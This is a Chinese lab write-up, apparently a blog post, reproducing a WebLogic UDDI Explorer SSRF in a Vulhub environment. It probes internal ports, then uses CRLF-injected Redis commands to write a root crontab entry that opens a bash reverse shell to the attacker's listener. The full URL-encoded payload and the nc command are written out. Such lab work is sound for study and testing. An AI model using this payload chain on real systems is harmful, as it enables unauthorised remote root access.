Weblogic SSRF漏洞复现

秒速五厘米 2023-10-07 21:39 49阅读 0赞

## SSRF简介 ##

SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造，漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能，比如从指定的URL地址获取网页内容，加载指定地址的图片、数据、下载等。

### 漏洞环境搭建 ###

使用Vulhub搭建

git clone [https://github.com/vulhub/vulhub.git][https_github.com_vulhub_vulhub.git] \#vulhuba靶场下载

> 1.cd vulhub/weblogic/ssrf \#进入ssrf文件夹
> 
> 2.docker-compose up -d \#启动编译靶场

![dc98742726a34085b8af6d5f0451101c.png][]

#### 启动靶场 ####

![40016774253948fe914d55d885f21ee8.png][]

访问docker IP:7001console/login/LoginForm.jsp

出现此界面，环境搭建成功

![a8e5bb3a646f463e86a2ac0e283e8aaf.png][]

SSRF漏洞位于http://IP:7001/uddiexplorer/SearchPublicRegistries.jsp

点击search，用bp抓包

![d0e573ac1ee444098147d51d984fe65e.png][]

"operator"参数后面是URL，可探测内网信息。

![5c45cffbfc9c4be8ad816303f28fb5f4.png][]

修改URL，探测7001端口，返回404提示，证明内网开放7001端口。

![13b8c5ad8abb4341acab69321ffdf2b5.png][]

探测不存在的端口，返回“but could not connect over”无法连接

![12e239c287774b7da453df98f4edba5c.png][]

查看redis服务IP

![c8bb9fafbe064eddbf4eaaa895f40b87.png][]

docker exec -it e84d45b3ec84 /bin/bash![a11498b7f0234349939415628fcfcc58.png][]

#### 查看redis服务 ####

"Received a response"表示存在redis服务

![374488d241bf4f0da4e5f2ecd23bd94d.png][]

### 利用Redis反弹shell ###

发送三条redis命令，将反弹shell脚本写入/etc/crontab

> test
> 
> set 1 "\\n\\n\\n\\n\* \* \* \* \* root bash -i >& /dev/tcp/**虚拟机的ip**/2022 0>&1\\n\\n\\n\\n"  
> config set dir /etc/  
> config set dbfilename crontab  
> save
> 
> qwezxc

URL编码：

test%0D%0A%0D%0Aset%201%20%22\\n\\n\\n\\n\*%20\*%20\*%20\*%20\*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.115.130%2F2022%200%3E%261\\n\\n\\n\\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

这里使用火狐插件HackBar

http://172.17.0.1:7001//uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22\\n\\n\\n\\n\*%20\*%20\*%20\*%20\*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.16.115.130%2F2022%200%3E%261\\n\\n\\n\\n%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aqwezxc

![2c95728b91024ae9bb797c140353c4e9.png][]

#### 打开kali监听 ####

nc -lvvp 2022

稍等一会，反弹shell

![50acd62b9a234c5896e42e0770ac7bf7.png][]

以上

如有问题，欢迎留言。

[https_github.com_vulhub_vulhub.git]: https://github.com/vulhub/vulhub.git
[dc98742726a34085b8af6d5f0451101c.png]: https://img-blog.csdnimg.cn/dc98742726a34085b8af6d5f0451101c.png
[40016774253948fe914d55d885f21ee8.png]: https://img-blog.csdnimg.cn/40016774253948fe914d55d885f21ee8.png
[a8e5bb3a646f463e86a2ac0e283e8aaf.png]: https://img-blog.csdnimg.cn/a8e5bb3a646f463e86a2ac0e283e8aaf.png
[d0e573ac1ee444098147d51d984fe65e.png]: https://img-blog.csdnimg.cn/d0e573ac1ee444098147d51d984fe65e.png
[5c45cffbfc9c4be8ad816303f28fb5f4.png]: https://img-blog.csdnimg.cn/5c45cffbfc9c4be8ad816303f28fb5f4.png
[13b8c5ad8abb4341acab69321ffdf2b5.png]: https://img-blog.csdnimg.cn/13b8c5ad8abb4341acab69321ffdf2b5.png
[12e239c287774b7da453df98f4edba5c.png]: https://img-blog.csdnimg.cn/12e239c287774b7da453df98f4edba5c.png
[c8bb9fafbe064eddbf4eaaa895f40b87.png]: https://img-blog.csdnimg.cn/c8bb9fafbe064eddbf4eaaa895f40b87.png
[a11498b7f0234349939415628fcfcc58.png]: https://img-blog.csdnimg.cn/a11498b7f0234349939415628fcfcc58.png
[374488d241bf4f0da4e5f2ecd23bd94d.png]: https://img-blog.csdnimg.cn/374488d241bf4f0da4e5f2ecd23bd94d.png
[2c95728b91024ae9bb797c140353c4e9.png]: https://img-blog.csdnimg.cn/2c95728b91024ae9bb797c140353c4e9.png
[50acd62b9a234c5896e42e0770ac7bf7.png]: https://img-blog.csdnimg.cn/50acd62b9a234c5896e42e0770ac7bf7.png